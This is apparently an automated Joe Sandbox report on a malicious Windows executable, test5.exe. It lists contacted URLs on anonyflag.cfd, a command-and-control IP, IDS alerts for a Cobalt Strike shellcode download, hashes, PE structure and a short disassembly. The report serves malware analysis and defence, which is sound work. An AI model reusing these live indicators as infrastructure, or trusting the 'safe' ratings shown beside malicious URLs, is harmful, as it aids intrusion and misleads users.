            https://anonyflag.cfd/deptest5.exe, 00000000.00000003.2563724864.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2342319930.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2581918132.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2322882748.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2619903564.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2360513191.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2600593531.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2284679172.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2304004153.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://anonyflag.cfd/ptest5.exe, 00000000.00000003.2415228352.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2396320681.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2135161924.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2173223996.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000002.2903186062.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2508432790.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2229582416.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2471560155.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2211383479.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2378590026.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2891419412.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2433982166.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2360513191.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2526696022.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2154433482.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2452787669.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              http://www.google.comtest5.exe, 00000000.00000003.2265856992.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2342319930.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1983240545.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2563724864.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2342319930.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1983240545.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2021648405.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1815398845.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2415228352.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2304004153.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1871884712.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2192543471.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2452787669.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1908657330.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1853432587.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2756737494.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2581918132.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2396320681.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2396320681.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2135161924.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2173223996.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://anonyflag.cfd/dertest5.exe, 00000000.00000003.2659827113.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2835335954.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2681610028.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2814212738.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://anonyflag.cfd/otest5.exe, 00000000.00000003.2079907928.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2060189313.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2040694877.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2098334299.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2021648405.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2116772004.000002150C7E1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://anonyflag.cfd/Khtest5.exe, 00000000.00000003.1833670081.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1815398845.000002150C807000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://anonyflag.cfd/videtest5.exe, 00000000.00000003.2835335954.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2794728878.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2814212738.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://anonyflag.cfd/Kbtest5.exe, 00000000.00000003.1926941171.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1945818103.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://anonyflag.cfd/yflag.cfd/Ptest5.exe, 00000000.00000003.2508432790.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://www.google.com4test5.exe, 00000000.00000003.1736880484.000002150C81A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://47.90.135.102/2Vcr.test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.microstest5.exe, 00000000.00000003.1713803951.0000021553CA4000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1736911456.0000021553CA4000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    47.90.135.102
                    unknownUnited States
                    45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                    104.21.34.5
                    anonyflag.cfdUnited States
                    13335CLOUDFLARENETUSfalse
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1581646
                    Start date and time:2024-12-28 11:35:07 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 4m 53s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:test5.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.mine.winEXE@1/0@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 21
                    • Number of non-executed functions: 120
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    TimeTypeDescription
                    05:36:01API Interceptor63x Sleep call for process: test5.exe modified
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    fp2e7a.wpc.phicdn.netFIyDwZM4OR.exeGet hashmaliciousUnknownBrowse
                    • 192.229.221.95
                    ZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
                    • 192.229.221.95
                    rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                    • 192.229.221.95
                    http://volmar.sinformations.cfdGet hashmaliciousUnknownBrowse
                    • 192.229.221.95
                    OTRykEzo6o.exeGet hashmaliciousUnknownBrowse
                    • 192.229.221.95
                    ctfmon.exeGet hashmaliciousUnknownBrowse
                    • 192.229.221.95
                    wce.exeGet hashmaliciousUnknownBrowse
                    • 192.229.221.95
                    atw3.dllGet hashmaliciousGozi, UrsnifBrowse
                    • 192.229.221.95
                    setup.msiGet hashmaliciousUnknownBrowse
                    • 192.229.221.95
                    ERTL09tA59.exeGet hashmaliciousLummaCBrowse
                    • 192.229.221.95
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdClibcurl.dllGet hashmaliciousMatanbuchusBrowse
                    • 47.254.174.185
                    EpCAySF1G6.exeGet hashmaliciousUnknownBrowse
                    • 8.218.163.62
                    EpCAySF1G6.exeGet hashmaliciousUnknownBrowse
                    • 8.218.163.62
                    xd.ppc.elfGet hashmaliciousMiraiBrowse
                    • 47.245.158.74
                    loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                    • 47.57.184.195
                    T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                    • 8.212.102.187
                    splarm7.elfGet hashmaliciousUnknownBrowse
                    • 47.253.191.95
                    nabsh4.elfGet hashmaliciousUnknownBrowse
                    • 47.240.78.242
                    splppc.elfGet hashmaliciousUnknownBrowse
                    • 47.52.40.232
                    arm.elfGet hashmaliciousUnknownBrowse
                    • 8.208.49.9
                    CLOUDFLARENETUSiien1HBbB3.exeGet hashmaliciousLummaCBrowse
                    • 104.21.66.86
                    SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                    • 104.21.2.51
                    oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                    • 104.21.66.86
                    MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                    • 172.67.157.254
                    l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                    • 172.67.157.254
                    XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                    • 172.67.157.254
                    GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                    • 104.21.66.86
                    TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
                    • 104.21.2.51
                    5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                    • 172.67.157.254
                    TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                    • 172.67.157.254
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    51c64c77e60f3980eea90869b68c58a8A4FY1OA97K.lnkGet hashmaliciousDanaBotBrowse
                    • 47.90.135.102
                    EQ5Vcf19u8.exeGet hashmaliciousSocks5SystemzBrowse
                    • 47.90.135.102
                    EQ5Vcf19u8.exeGet hashmaliciousSocks5SystemzBrowse
                    • 47.90.135.102
                    vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                    • 47.90.135.102
                    vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                    • 47.90.135.102
                    r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                    • 47.90.135.102
                    gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                    • 47.90.135.102
                    gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                    • 47.90.135.102
                    WindowsUpdate.exeGet hashmaliciousUnknownBrowse
                    • 47.90.135.102
                    Hbq580QZAR.exeGet hashmaliciousSocks5SystemzBrowse
                    • 47.90.135.102
                    37f463bf4616ecd445d4a1937da06e19tzA45NGAW4.lnkGet hashmaliciousUnknownBrowse
                    • 104.21.34.5
                    soft 1.14.exeGet hashmaliciousMeduza StealerBrowse
                    • 104.21.34.5
                    solara-executor.exeGet hashmaliciousUnknownBrowse
                    • 104.21.34.5
                    Setup.exeGet hashmaliciousUnknownBrowse
                    • 104.21.34.5
                    Setup.exeGet hashmaliciousUnknownBrowse
                    • 104.21.34.5
                    setup.msiGet hashmaliciousUnknownBrowse
                    • 104.21.34.5
                    search.htaGet hashmaliciousUnknownBrowse
                    • 104.21.34.5
                    TrdIE26br9.msiGet hashmaliciousUnknownBrowse
                    • 104.21.34.5
                    JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                    • 104.21.34.5
                    T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                    • 104.21.34.5
                    No context
                    No created / dropped files found
                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                    Entropy (8bit):6.953591135499263
                    TrID:
                    • Win64 Executable GUI (202006/5) 92.65%
                    • Win64 Executable (generic) (12005/4) 5.51%
                    • Generic Win/DOS Executable (2004/3) 0.92%
                    • DOS Executable Generic (2002/1) 0.92%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:test5.exe
                    File size:4'492'800 bytes
                    MD5:ac76c4a995accb8a1d272cb76c4374ee
                    SHA1:634fe41bf551c79cd1a3d9eb019da51d8c3803b5
                    SHA256:30f23855d09b242339d3bdd20fc72ac30569be14701fe6a3080b284a15eeacf0
                    SHA512:f86f947e814686e0e2587903cc193f4b199f2408d4981f54382e775b3297f03b4cc4f08a7d22af91b36569e147e4e114ef1d342280cf76149c197c6879acc7e9
                    SSDEEP:49152:1KJbZO1TH+vgz2Vit6e/ZhjX5ENwXa6DsTQUVqVQRrOw8nP1tvAvK:1KI7CLeR3E6K6DsZVgQ4n/SK
                    TLSH:6A268D07EC9104F9C0A9A33189A692A37B71BC184B3163DB3F60B7782E767D45EB9750
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........A.J....."......"...V................@...............................I...........`... ............................
                    Icon Hash:90cececece8e8eb0
                    Entrypoint:0x471fe0
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:1
                    File Version Major:6
                    File Version Minor:1
                    Subsystem Version Major:6
                    Subsystem Version Minor:1
                    Import Hash:d42595b695fc008ef2c56aabd8efd68e
                    Instruction
                    jmp 00007FF460D8AF00h
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    push ebp
                    dec eax
                    mov ebp, esp
                    pushfd
                    cld
                    dec eax
                    sub esp, 000000E0h
                    dec eax
                    mov dword ptr [esp], edi
                    dec eax
                    mov dword ptr [esp+08h], esi
                    dec eax
                    mov dword ptr [esp+10h], ebp
                    dec eax
                    mov dword ptr [esp+18h], ebx
                    dec esp
                    mov dword ptr [esp+20h], esp
                    dec esp
                    mov dword ptr [esp+28h], ebp
                    dec esp
                    mov dword ptr [esp+30h], esi
                    dec esp
                    mov dword ptr [esp+38h], edi
                    movups dqword ptr [esp+40h], xmm6
                    movups dqword ptr [esp+50h], xmm7
                    inc esp
                    movups dqword ptr [esp+60h], xmm0
                    inc esp
                    movups dqword ptr [esp+70h], xmm1
                    inc esp
                    movups dqword ptr [esp+00000080h], xmm2
                    inc esp
                    movups dqword ptr [esp+00000090h], xmm3
                    inc esp
                    movups dqword ptr [esp+000000A0h], xmm4
                    inc esp
                    movups dqword ptr [esp+000000B0h], xmm5
                    inc esp
                    movups dqword ptr [esp+000000C0h], xmm6
                    inc esp
                    movups dqword ptr [esp+000000D0h], xmm7
                    inc ebp
                    xorps xmm7, xmm7
                    dec ebp
                    xor esi, esi
                    dec eax
                    mov eax, dword ptr [002ADE02h]
                    dec eax
                    mov eax, dword ptr [eax]
                    dec eax
                    cmp eax, 00000000h
                    je 00007FF460D8E7E5h
                    dec esp
                    mov esi, dword ptr [eax]
                    dec eax
                    sub esp, 10h
                    dec eax
                    mov eax, ecx
                    dec eax
                    mov ebx, edx
                    call 00007FF460D9823Bh
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x4650000x53e.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x3240000x7908.pdata
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4660000x6a70.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x2a41c00x178.data
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x13214b0x1322006b217a12f77539aedb9ee6336f286851False0.4484068752552062data6.278304117862662IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x1340000x16f0e00x16f200b4f4bf3b3d68bdc5c28b93527c02a8eeFalse0.43662219101123595data5.750976957762315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x2a40000x7fac00x35600fd1716a15170d77a38e4270b517f30d5False0.36168947599531615data4.683653575448602IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .pdata0x3240000x79080x7a007a69f4537fd200d81e49160a0405178cFalse0.40288806352459017data5.319641636818224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .xdata0x32c0000xb40x2004b5b63b6874df65239dc99aa4c50ce97False0.22265625shared library1.783206012798912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    /40x32d0000x14c0x200aaf28638a5fca2ae9b61c2d0ecb5c6e7False0.697265625data5.610479515469117IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    /190x32e0000x3dc910x3de002256c82066f38af88126b080cde2eb02False0.9990767045454545data7.995650064693668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    /320x36c0000xc39b0xc40048cce4a3ca34e8195d72c07cbc60dc52False0.9969308035714286data7.933824164939166IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    /460x3790000x680x2001a24a35de8624cf9a09a0c78bac4c352False0.212890625data1.7020804543167358IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    /650x37a0000x911410x912007da86535a019c360b709d7dce2400ba7False1.0000639265719207data7.99808013808122IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    /780x40c0000x42b340x42c0097c14c3bfb584585517081c1fc4087fcFalse0.9962546816479401data7.992184842908324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    /900x44f0000x15fc70x160002ee15ab12252bf9d6046c8d0b26a6b96False0.9755637428977273data7.797240255313336IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    .idata0x4650000x53e0x600830a83365f44e4a95a3600e48f699567False0.3743489583333333OpenPGP Public Key3.9411322449246575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .reloc0x4660000x6a700x6c009e399d4e418337896ade4660adcfb3d3False0.2893880208333333data5.406112735735817IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    .symtab0x46d0000x2ebf40x2ec001ffd34108f8898b7e1b1d36c5941068fFalse0.2423285010026738data5.188195276507059IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    DLLImport
                    kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, RtlVirtualUnwind, RtlLookupFunctionEntry, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler, AddVectoredContinueHandler
                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-12-28T11:35:59.196677+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44973147.90.135.102443TCP
                    2024-12-28T11:35:59.929737+01002035442ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1147.90.135.102443192.168.2.449731TCP
                    TimestampSource PortDest PortSource IPDest IP
                    Dec 28, 2024 11:35:57.697926044 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:57.698004961 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:57.698092937 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:57.712850094 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:57.712876081 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.196415901 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.196676970 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:59.252680063 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:59.252741098 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.252984047 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.253051996 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:59.255776882 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:59.299335003 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.638058901 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.638277054 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:59.652833939 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.652842045 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.652928114 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:59.652954102 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.653012991 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:59.719568014 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.719649076 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:59.719671965 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.719727993 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:59.851551056 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.851650000 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:59.851671934 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.851728916 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:59.883997917 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.884097099 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:59.884115934 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.884169102 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:59.906394958 CET4434973147.90.135.102192.168.2.4
                    Dec 28, 2024 11:35:59.906471968 CET49731443192.168.2.447.90.135.102
                    Dec 28, 2024 11:35:59.906498909 CET4434973147.90.135.102192.168.2.4
